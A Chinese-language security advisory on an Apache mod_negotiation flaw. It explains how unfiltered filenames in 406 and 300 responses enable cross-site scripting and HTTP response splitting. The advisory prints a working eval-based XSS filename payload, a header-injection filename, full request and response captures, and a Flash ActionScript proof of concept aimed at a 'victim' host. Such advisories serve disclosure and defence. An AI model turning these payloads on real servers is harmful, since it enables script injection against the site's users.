涉及程序:
Apache HTTP Server
描述:
Apache mod_negotiation模块HTML注入及HTTP响应拆分漏洞
详细:
Apache HTTP Server是一款流行的Web服务器。
Apache的Mod_negotiation没有正确地过滤406 Not Acceptable响应和300 Multiple Choices消息体中的文件名,这可能导致跨站脚本攻击;此外由于也未经过滤便发送了文件名列表,因此如果文件名中包含有换行符的话还可能导致HTTP响应拆分。
I. 跨站脚本
假设启用了mod_negotiation模块,且攻击者可以上传带有任意名称和mime扩展的文件,如以下名称的jpeg文件:
<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg
然后请求该文件,将Accept头设置为image/jpeg; q=0
----------------------------------------------------
GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))>
HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0
HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 15:43:11 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg}
{length 2}}
Vary: negotiate
TCN: list
Content-Length: 610
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /<img
src=sa
onerror=eval(document.location.hash.substr(1))> could not be found
on
this server.</p>
Available variants:
<ul>
<li><a href="<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg">
<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> ,
type image/jpeg</li>
</ul>
<hr>
-----------------------------------------------------
可见没有过滤文件名,导致跨站脚本攻击。
II. HTTP响应拆分
如果可以设置类似于以下的文件名,就可以使用类似的技术触发HTTP响应拆分:
'junk
Header: Injected
blah:.jpg'
然后请求urlencode编码的文件名:
------------------------------------------------------
GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0
HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 16:06:52 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"junk
Header: Injected <----- Here!
blah:.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /junk
Header: Injected
blah: could not be found on this server.</p>
Available variants:
<ul>
<li><a href="junk
Header: Injected
blah:.jpg">junk
Header: Injected
blah:.jpg</a> , type image/jpeg</li>
</ul>
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port
80</address>
</body></html>
------------------------------------------------------
可见头响应被拆分,注入了Header: Injected。
<*来源:Stefano Di Paola (stefano@dipaola.wisec.it)
链接:http://marc.info/?l=bugtraq&m=120104197026599&w=2
*>
受影响系统:
Apache Group Apache <=1.3.39
Apache Group Apache <= 2.2.6
Apache Group Apache <= 2.0.61
攻击方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
----------------------------------------------------------
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%
20onerror=eval(document.location.hash.substr(1))>#alert(123)');
r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg;
q=0'));
navigateToURL(r, '_self');
}
}
}
----------------------------------------------------------